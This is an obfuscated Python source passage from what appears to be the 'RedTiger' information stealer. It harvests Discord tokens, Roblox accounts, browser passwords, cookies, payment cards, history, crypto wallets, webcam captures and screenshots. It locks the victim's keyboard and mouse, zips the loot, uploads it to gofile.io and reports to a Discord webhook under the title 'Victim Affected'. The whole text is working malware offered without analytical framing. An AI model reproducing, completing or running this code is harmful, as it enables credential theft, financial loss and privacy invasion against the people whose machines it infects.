    IPCBELQRFLRGCBQYMBGHDCPGPYQEILIAVMKAGYCVTLNVHSLIZSUQEHEQXBAURMLJTNKPPDILBBKBUALGENAVFNUGLTRDVYZJ = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('country', "None")
    IPCBELQRFLRGCBQYMBGHDCPGPYQEILIAVMKAGYCVTLNVHSLIZSUQEHEQXBAURMLJTNKPPDILBBKBUALGENAVFNUGLTRDVYZJ_code = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('countryCode', "None")
    YGAEVYNKGMQLXFOTSJSGYQLCBOAQNFKUHJIYHREEJREVTKNUWDA = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('regionName', "None")
    YGAEVYNKGMQLXFOTSJSGYQLCBOAQNFKUHJIYHREEJREVTKNUWDA_code = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('region', "None")
    XFRGBYTEJAARQDCARIRLIXXVFUWZLBPOQOIPIDYMNPYHMLAXUOHFBCNUVKKRFJDTPBIZRZZOOOBXKDUMDFONONNCRSYWPMCFNYQ = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('zip', "None")
    OPJHEKSGKGORUZGWMTIQUJTUAGIKEIXTLZYGLLFJTUHDRCLMOYAQGUNRSMGYVSRJDSSGYNLG = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('city', "None")
    AJFIRJMOUAQBUSTZQAUUQFDXVHDZJEZALOKTBMYWZMEYRJQXWBBWSBDGEKEADMWSTSG = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('lat', "None")
    QYWNITXHGJNVVECDYGARLEXXBPRAIJMCVTGDNSDAXOATLTMDURGOLDMADANUJBUBAXRSMCOPDACOSZU = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('lon', "None")
    NJQVXQSMUGFKTNZHQSGRXLBHCKDECFKVHEXQCZQDEYVUHSJNVQSVSAQDBJQYTWTJDVMKBTFMMLHYJE = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('timezone', "None")
    BSJZSSWNXODFGPKVBRIXCNKOZICABEKADWMCBSNGIIJGQRPWZZFVSGQOEDLQQUKYEDEVC = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('isp', "None")
    UPGYLLSEHKJCCJOEDNSFODZZRUUDDAMAATZQZCPYANJHKYZWJKGIHVMEYRHZMY = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('org', "None")
    LOZAXKWYGADPDERUYSSJLVZWESSGYXSILPTJWWNOXMSHSEUCLIAALKR = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('as', "None")

def URGNVEYBHLDPJFDIXVFPABVRNTAAZWQCMRQKJWBFXFPINQDJSLYLPEPDERSOHESPNPTAFEMFLSTOZQ():
    import keyboard
    k3y = [
        "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
        "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
        "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "ù",
        "`", "+", "-", "=", "*", "[", "]", "\\", ";", "'", ",", ".", "/", 
        "space", "enter", "esc", "tab", "backspace", "delete", "insert",
        "up", "down", "left", "right", "equal", "home", "end", "page up", "page down",
        "caps lock", "num lock", "scroll lock", "shift", "ctrl", "cmd", "win",
        "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12",
        "backslash", "semicolon", "comma", "period", "slash",
        "volume up", "volume down", "volume mute",
        "app", "sleep", "print screen", "pause",
    ]
    for k3y_b10ck in k3y:
        try: keyboard.block_key(k3y_b10ck)
        except: pass

def OZFIFLTIZPUAKWYHJATKSWPSLKHSRIIYVGFDPUIHXUCJXCHEKFISXNCJROJWIOKCIRARWUYDSP():
    import keyboard
    k3y = [
        "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
        "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
        "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "ù",
        "`", "+", "-", "=", "*", "[", "]", "\\", ";", "'", ",", ".", "/", 
        "space", "enter", "esc", "tab", "backspace", "delete", "insert",
        "up", "down", "left", "right", "equal", "home", "end", "page up", "page down",
        "caps lock", "num lock", "scroll lock", "shift", "ctrl", "cmd", "win",
        "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12",
        "backslash", "semicolon", "comma", "period", "slash",
        "volume up", "volume down", "volume mute",
        "app", "sleep", "print screen", "pause",
    ]
    for k3y_b10ck in k3y:
        try: keyboard.unblock_key(k3y_b10ck)
        except: pass

def SYDZRHYNAGWOSYXJEORFCFIPTSUHHHAIHJNGQAJJQMYSANBOSEIFYJMILSOKXSRMTCZRSJYAEAAVKCHDJIZFXSUGYOHXFRYTW():
    import pyautogui
    pyautogui.FAILSAFE = False
    width, height = pyautogui.size()
    pyautogui.moveTo(width + 100, height + 100)

def HPEFTICMAWKZGIZZHCFECFYEPGHJRANFDWTJAYMVTIUPJJOASXIMALJSLZYAEEDITCXLCEUKYLTFIVCBAKVLAKAUYWLBU():
    import keyboard
    while True:
        try:
            SYDZRHYNAGWOSYXJEORFCFIPTSUHHHAIHJNGQAJJQMYSANBOSEIFYJMILSOKXSRMTCZRSJYAEAAVKCHDJIZFXSUGYOHXFRYTW()
            TTIETLCCEZBDAAHNNUGWKBWILEFFPSHRPMSJAVVPGERQXEVXEEYCROOPBJZWEGMLPVYZSHFNXCPVFBIORMXVELJJ()
            JIHVBVCCAEUKYFIZXHTVESOYGELNMRZYXVCZTEOHFJGWSMUTJNGYZIQNVAYAYT()
            if keyboard.is_pressed('alt') and keyboard.is_pressed('alt gr'):
                Unb10ck_K3y()
                break
        except:
            pass

PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY = []

SNQMIMNVDBPFBRBDWWCLIQKLUHVRCYEVTFPAYLIQAWDSLGEYIPXYDO = io.BytesIO()
with zipfile.ZipFile(SNQMIMNVDBPFBRBDWWCLIQKLUHVRCYEVTFPAYLIQAWDSLGEYIPXYDO, "w", zipfile.ZIP_DEFLATED) as GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI:

    try: 
        DHBREOBZSBBZOSNRXBUQJSIYQEENKIKLDOSIPPWQRLOQFJUXBUVVRFLYWAYSBCHXN = HGBBBFWDJQDUEKQFJAFLHODQVBODUKIWSSNMVJYKQHJZLNVXCYXFMHUIZDDCMTYDYWWMVLDGGTNTVQKUDDIDFDGYNRWK()
    except Exception as e:
        DHBREOBZSBBZOSNRXBUQJSIYQEENKIKLDOSIPPWQRLOQFJUXBUVVRFLYWAYSBCHXN = f"Error: {e}"

    try: 
        ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_system_info = CDQETDQWEWMTVTXDNXGYPHTAYMMXOZODCJCYLPQTQOKPBMRCJIKVTSRZYOOVUKXUSHMYXWZV(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI)
    except Exception as e:
        ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_system_info = f"Error: {e}"

    try: 
        MTFPKQQKWHARCXLVUMLOKLZSFDVQQQSEATSULVNWHZDOOTZCWWAVPRVBUEGVTPWGJWVFZVPDEXYXWXXIPIXQPMEPQTPITOWRE = YAQZVWLJXDMHLIDVNCITRFNENLHCJDIDPVUKUVHSCHGRHDWTGZUGBCBGUYJYBDAUZLNXNEBS(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI)
    except Exception as e:
        MTFPKQQKWHARCXLVUMLOKLZSFDVQQQSEATSULVNWHZDOOTZCWWAVPRVBUEGVTPWGJWVFZVPDEXYXWXXIPIXQPMEPQTPITOWRE = f"Error: {e}"

    try: 
        OENUWSIBCHDBBSHEVOJJBGBONSBGJGERYZXCNLTUKJMCRZUFRHQRQMJXQZNHMURMGTMBJJUKINWHECBNSFHLGWVFS, CDVOIFUGZAREQDVEXPZSYZMFEDDWKPTILXJSTWIQCHRXKCWOSDYBRSVYDKAWJQWDMDADYDFETKXCLDISZPDVUNWCZSHKKUISHFS, VASJZLSYQUYEXNGQSODHGNABBWCXCMGNAQPFJJLTMNOGPHRAXRKBUZUYDPMFGJRRRTDRIQKSGHUSWHXCQJUDBLON, LPLGLSSOEFYLUSYQZOSAFCRYCEEBIVWKXFKHGQTPGJDZVSWQXOOZQSPJKDMFCUDZCLCHZXBOAYSHXJSSP, XKLHSMPZWHPGLUMYATNMUJABHBXWXLFMRWEGWXRLDZKTVHWRMOJ, NNDRYATTNXLAMKAEVEQZSANXMZZEEUOMPINAONIMQARIKQXPCJZIZOWSIGTPGFYJTNI = TELDOKQKPYTOKWQTIFAFMKRNJQWDETUFKLDJDREGNJPHPAWTVIHHFXQTZYKLKTUP(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI)
    except Exception as e:
        OENUWSIBCHDBBSHEVOJJBGBONSBGJGERYZXCNLTUKJMCRZUFRHQRQMJXQZNHMURMGTMBJJUKINWHECBNSFHLGWVFS = f"Error: {e}"
        CDVOIFUGZAREQDVEXPZSYZMFEDDWKPTILXJSTWIQCHRXKCWOSDYBRSVYDKAWJQWDMDADYDFETKXCLDISZPDVUNWCZSHKKUISHFS = f"Error: {e}"
        VASJZLSYQUYEXNGQSODHGNABBWCXCMGNAQPFJJLTMNOGPHRAXRKBUZUYDPMFGJRRRTDRIQKSGHUSWHXCQJUDBLON = f"Error: {e}"
        LPLGLSSOEFYLUSYQZOSAFCRYCEEBIVWKXFKHGQTPGJDZVSWQXOOZQSPJKDMFCUDZCLCHZXBOAYSHXJSSP = f"Error: {e}"
        XKLHSMPZWHPGLUMYATNMUJABHBXWXLFMRWEGWXRLDZKTVHWRMOJ = f"Error: {e}"
        NNDRYATTNXLAMKAEVEQZSANXMZZEEUOMPINAONIMQARIKQXPCJZIZOWSIGTPGFYJTNI = f"Error: {e}"

    try: 
        KLUSZZRXTRKINCHHWDGCTRQQYEHGAFVLOFLOCTCXCGKZZQLUWMDSUQEYHREKXCIHULLZGYMUYPPUHLVOLFY = FAKRIQLLTWPHMSMOANUFTDYOHZFVYHWFPHMFNMMFMSJVQKJIUNOIHCQRXYKNJIANLSCCQONWUTHHAPHYUNATYGBUYVZOQGFQRQ(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI)
    except Exception as e:
        KLUSZZRXTRKINCHHWDGCTRQQYEHGAFVLOFLOCTCXCGKZZQLUWMDSUQEYHREKXCIHULLZGYMUYPPUHLVOLFY = f"Error: {e}"

    try: 
        ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_camera_capture = GSGODXYXOBEKRIVHROCBVIPPVCQTHUOLFMVSMIVDCOVGTHTZKWTDHNNAWZCWHHLVHND(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI)
    except Exception as e:
        ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_camera_capture = f"Error: {e}"

    try: 
        ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_screenshot = KNNFWPPQHMOILISTTVWJONMMDQAHGSRFMFYDZGCENQDJXIRMMLJXZCZEYDDGAVYRHWFWLKHCY(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI)
    except Exception as e:
        ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_screenshot = f"Error: {e}"

    try: 
        MHCLFXYJIJWWQTRPTDLNDDOTIFDKNQSLKHCCKSZCRRLDFDOXGSRGDPDLEKOK, RODXFLWPTINSOXSRZCOARJJENICLGGQHKJSOCEEOUUNQZURKIFBCVPEUAQNWTEDTPYDPCOQGKCW, HNZKUCAZMJWHKRFDNHDBQJMKHADEXTNLKGMOQHURAOTYZOCLVDNRNOWNDHWTHW = QOIFRWRXVUPBWXYJXIEYGFBAGAUHBREXCONMTHCYJRDIOAHSLEQMASIPADOQGGIAEZWQHGJXSQUEFOHDQNHKZ(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI)
    except Exception as e:
        ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_screenshot = f"Error: {e}"

    try: 
        FPVAEMNGFJQPYWHLWYEBFBVXQWPJBHHKERGICEPKJHKAFCJCNGOSHUGVPZXKEDKUHUPW = PTCWFEETQLZDVTBHMUXBSJLTNKAAWLLEDEBFZIFQDNQQTPZHPL(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI)
    except Exception as e:
        FPVAEMNGFJQPYWHLWYEBFBVXQWPJBHHKERGICEPKJHKAFCJCNGOSHUGVPZXKEDKUHUPW = f"Error: {e}"

    if DHBREOBZSBBZOSNRXBUQJSIYQEENKIKLDOSIPPWQRLOQFJUXBUVVRFLYWAYSBCHXN != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Discord Injection : {DHBREOBZSBBZOSNRXBUQJSIYQEENKIKLDOSIPPWQRLOQFJUXBUVVRFLYWAYSBCHXN}")

    if ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_camera_capture != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Camera Capture    : {ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_camera_capture}")

    if ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_screenshot != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Screenshot        : {ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_screenshot}")

    if ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_system_info != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"System Info       : {ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_system_info}")

    if MTFPKQQKWHARCXLVUMLOKLZSFDVQQQSEATSULVNWHZDOOTZCWWAVPRVBUEGVTPWGJWVFZVPDEXYXWXXIPIXQPMEPQTPITOWRE != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Discord Accounts  : {MTFPKQQKWHARCXLVUMLOKLZSFDVQQQSEATSULVNWHZDOOTZCWWAVPRVBUEGVTPWGJWVFZVPDEXYXWXXIPIXQPMEPQTPITOWRE}")

    if KLUSZZRXTRKINCHHWDGCTRQQYEHGAFVLOFLOCTCXCGKZZQLUWMDSUQEYHREKXCIHULLZGYMUYPPUHLVOLFY != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Roblox Accounts   : {KLUSZZRXTRKINCHHWDGCTRQQYEHGAFVLOFLOCTCXCGKZZQLUWMDSUQEYHREKXCIHULLZGYMUYPPUHLVOLFY}")

    if CDVOIFUGZAREQDVEXPZSYZMFEDDWKPTILXJSTWIQCHRXKCWOSDYBRSVYDKAWJQWDMDADYDFETKXCLDISZPDVUNWCZSHKKUISHFS != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Passwords         : {CDVOIFUGZAREQDVEXPZSYZMFEDDWKPTILXJSTWIQCHRXKCWOSDYBRSVYDKAWJQWDMDADYDFETKXCLDISZPDVUNWCZSHKKUISHFS}")

    if VASJZLSYQUYEXNGQSODHGNABBWCXCMGNAQPFJJLTMNOGPHRAXRKBUZUYDPMFGJRRRTDRIQKSGHUSWHXCQJUDBLON != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Cookies           : {VASJZLSYQUYEXNGQSODHGNABBWCXCMGNAQPFJJLTMNOGPHRAXRKBUZUYDPMFGJRRRTDRIQKSGHUSWHXCQJUDBLON}")

    if NNDRYATTNXLAMKAEVEQZSANXMZZEEUOMPINAONIMQARIKQXPCJZIZOWSIGTPGFYJTNI != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Cards             : {NNDRYATTNXLAMKAEVEQZSANXMZZEEUOMPINAONIMQARIKQXPCJZIZOWSIGTPGFYJTNI}")

    if LPLGLSSOEFYLUSYQZOSAFCRYCEEBIVWKXFKHGQTPGJDZVSWQXOOZQSPJKDMFCUDZCLCHZXBOAYSHXJSSP != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Browsing History  : {LPLGLSSOEFYLUSYQZOSAFCRYCEEBIVWKXFKHGQTPGJDZVSWQXOOZQSPJKDMFCUDZCLCHZXBOAYSHXJSSP}")

    if XKLHSMPZWHPGLUMYATNMUJABHBXWXLFMRWEGWXRLDZKTVHWRMOJ != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Download History  : {XKLHSMPZWHPGLUMYATNMUJABHBXWXLFMRWEGWXRLDZKTVHWRMOJ}")

    if OENUWSIBCHDBBSHEVOJJBGBONSBGJGERYZXCNLTUKJMCRZUFRHQRQMJXQZNHMURMGTMBJJUKINWHECBNSFHLGWVFS != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Extentions        : {OENUWSIBCHDBBSHEVOJJBGBONSBGJGERYZXCNLTUKJMCRZUFRHQRQMJXQZNHMURMGTMBJJUKINWHECBNSFHLGWVFS}")

    if MHCLFXYJIJWWQTRPTDLNDDOTIFDKNQSLKHCCKSZCRRLDFDOXGSRGDPDLEKOK != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Wallets           : {MHCLFXYJIJWWQTRPTDLNDDOTIFDKNQSLKHCCKSZCRRLDFDOXGSRGDPDLEKOK}")

    if RODXFLWPTINSOXSRZCOARJJENICLGGQHKJSOCEEOUUNQZURKIFBCVPEUAQNWTEDTPYDPCOQGKCW != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Game Launchers    : {RODXFLWPTINSOXSRZCOARJJENICLGGQHKJSOCEEOUUNQZURKIFBCVPEUAQNWTEDTPYDPCOQGKCW}")
    
    if HNZKUCAZMJWHKRFDNHDBQJMKHADEXTNLKGMOQHURAOTYZOCLVDNRNOWNDHWTHW != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Apps              : {HNZKUCAZMJWHKRFDNHDBQJMKHADEXTNLKGMOQHURAOTYZOCLVDNRNOWNDHWTHW}")
    
    if FPVAEMNGFJQPYWHLWYEBFBVXQWPJBHHKERGICEPKJHKAFCJCNGOSHUGVPZXKEDKUHUPW != None:
        PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY.append(f"Interesting Files : {FPVAEMNGFJQPYWHLWYEBFBVXQWPJBHHKERGICEPKJHKAFCJCNGOSHUGVPZXKEDKUHUPW}")

SNQMIMNVDBPFBRBDWWCLIQKLUHVRCYEVTFPAYLIQAWDSLGEYIPXYDO.seek(0)

try:
    try: JTQBWLYJNTPYVOTBPNTXOOEBIJWCAGJJYAIDQJXADBLGRGDTFENEEEDONPOAONYCYMULVNPRBQRANOHQYHHYJH = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
    except: JTQBWLYJNTPYVOTBPNTXOOEBIJWCAGJJYAIDQJXADBLGRGDTFENEEEDONPOAONYCYMULVNPRBQRANOHQYHHYJH = "store4"

    OPYUDTNYZLOYANKWQTJMAJLGIKWAIUCJSFEFSQAFAEIFTALSVYQBEDRFNELFUUPKMGBGROJDRZ = requests.post(
        f"https://{JTQBWLYJNTPYVOTBPNTXOOEBIJWCAGJJYAIDQJXADBLGRGDTFENEEEDONPOAONYCYMULVNPRBQRANOHQYHHYJH}.gofile.io/uploadFile",
        files={"file": (f"RedTiger_{ZQATRCPFCNNZJROXJTVZCFGGWBRYMMRLJVGEGYUJPWGXNKUCXDXWODTOIUVFRAUVLOAXQCMPHUPKMZF.replace(' ', '_')}.zip", SNQMIMNVDBPFBRBDWWCLIQKLUHVRCYEVTFPAYLIQAWDSLGEYIPXYDO)}
    )

    NSDOIPJZFQNVROAJKZIEUOORKPUTRRPTTFKYYECDVECDLOLRTHSQJUNIJFRXKYNPGZEHYXYUINKYMKMBPJ = OPYUDTNYZLOYANKWQTJMAJLGIKWAIUCJSFEFSQAFAEIFTALSVYQBEDRFNELFUUPKMGBGROJDRZ.json()["data"]["downloadPage"]
except Exception as e:
    NSDOIPJZFQNVROAJKZIEUOORKPUTRRPTTFKYYECDVECDLOLRTHSQJUNIJFRXKYNPGZEHYXYUINKYMKMBPJ = f"Error: {e}"

embed = discord.Embed(title="Victim Affected", color=NZMOUGMLKLIUIHBHAMBYXWTPWPFAZTIUKQLZCJRBPRVKMHBHQQPEUYMIEFAQEOXQNWIMHIKYHRCBEBGWYEOZRSLIEANJJBHQZLL
).add_field(
    inline=False,
    name="Summary of Information", 
    value=f"""```
Hostname    : {VVSUQONKEESUNDQYVHVYDTGRWWITLMGECJHIQZVZAEUWWLYAPBZEUYCEVRXFLZQCCYHAAZLSIFXNHSGDUGSSVVONTJLSI}
Username    : {ZQATRCPFCNNZJROXJTVZCFGGWBRYMMRLJVGEGYUJPWGXNKUCXDXWODTOIUVFRAUVLOAXQCMPHUPKMZF}
DisplayName : {VSQTLINTCHIKQQKDZMOYZCZYTUHMIMAQGSCILZGIJQHUGFCJFCRCZRQYPJATWNXPOHUEUEQTIFWINRUQMSRYBRYYAUYQJGKBVT}
Ip Public   : {TINHQYUZIWDWZRHORFYTCMQAOQDBOVRGBDDOPJQMFFSTJZBLJHSUKWYNSEKCPWLJXQLODMRQYJPYMVDIACWERWVGMYNNPVPSFK}
Ip Local    : {SXYDOVCUVVBTLVILHCADGOHRQZJHTHDCBQNYTMXPJMDXGRTDSRUKRPJXKPHC}
Country     : {IPCBELQRFLRGCBQYMBGHDCPGPYQEILIAVMKAGYCVTLNVHSLIZSUQEHEQXBAURMLJTNKPPDILBBKBUALGENAVFNUGLTRDVYZJ}```"""
).add_field(
    inline=False,
    name="Stolen Information", 
    value=f"""```swift
{"\n".join(PXYPQPUMHVWDJNLGPCOGUHNCJUKJZLJNZQCCSKWDQEFOPMMJTFZJBGRGTZBICBNFCWCCJQXTWMOVYATMXYMBKAUOAPZSLSNY)}```"""
).add_field(
    inline=False,
    name="Download Link", 
    value=f"""{NSDOIPJZFQNVROAJKZIEUOORKPUTRRPTTFKYYECDVECDLOLRTHSQJUNIJFRXKYNPGZEHYXYUINKYMKMBPJ}"""
).set_footer(
    text=JVMFEKEDQZGCLHQWYSQRNRUUZCHYWGOBWZDJLKNKKDGQUWBWLOJBOKOLNFORGQARRAUQIHBOYZYMEAEZZZ, 
    icon_url=GJFPFEOHFAGJMDCOMVNRGHEXXUSWTSRRJRPGYBRDXIQRYPZBXFPUK
)

try:  
    TULIJUKTSWYDJKHZVYLYLIDJPEUZNJYHOKWZUWQUJTAEPYAJHPLAGQMNYQWQSLE = discord.SyncWebhook.from_url(YCHGWJQUWPANVXMFKQJKWGNCFOYDIAWCFXPDTGWBCUZESEKHOJMSLTGKMBFGXFXJHYWDO)
    TULIJUKTSWYDJKHZVYLYLIDJPEUZNJYHOKWZUWQUJTAEPYAJHPLAGQMNYQWQSLE.send(embed=embed, username=UGTRNXTXLBRLTKMIMGDVWMDKYIKWBYJQCFYSFDFEFBWVEOBBJUUOCJKQKHCRNELFVBJANHNKXFGIMILKJGI, avatar_url=GJFPFEOHFAGJMDCOMVNRGHEXXUSWTSRRJRPGYBRDXIQRYPZBXFPUK)
except: pass


try: threading.Thread(target=URGNVEYBHLDPJFDIXVFPABVRNTAAZWQCMRQKJWBFXFPINQDJSLYLPEPDERSOHESPNPTAFEMFLSTOZQ).start()
except: pass
try: threading.Thread(target=FGJCOXUEEHSQVFFVRCLETRRAQFSMJDQOVNASEWIAKOURBVKTISUZCZPDTPALNVDFGUCXJHFEDFBFIMDEFLZYQYWJ).start()
except: pass
try: threading.Thread(target=YDUBWQFAOHKDEJXKCISUMEYDFLVDXXGGIIHBZBXXQTJHGICGEXVOWWLWFMQCZYPYWGFAWAKVMBGUX).start()
except: pass
try: threading.Thread(target=UNCOGODZBFJBNKYIZGFDBLDILZHVZLFWIVXZXWYAHHMJYSCNBSBVEKQTPKV).start()
except: pass
try: threading.Thread(target=BNJQQZXPYILSKOBEOOVCMARLIRGWHTDUFHCXIOWLLOOMHWVEIROPY).start()
except: pass
try: threading.Thread(target=HFKFUIVNUFWLRYVKFPCUKGMWSHPWSWKYVCFBBVGKEZKXNCORWRCJWVZKLCG).start()
except: pass
try: threading.Thread(target=NZWLNZMYEYUPFOBFFWWZNYJZBNXIXGJYRQKBWZTYUEVRJRFKLQZNVJDMJLHXLJTGFDTQCOSAEYYEOECRMAYSIZPQIS).start()
except: pass
try: threading.Thread(target=NPRKMWSOGMRXBVRXYHKZPISWMOBNFUKRZKHZAPBVOFQZMRWGQCLEPIXEODWGYOHKFYJFO).start()
except: pass
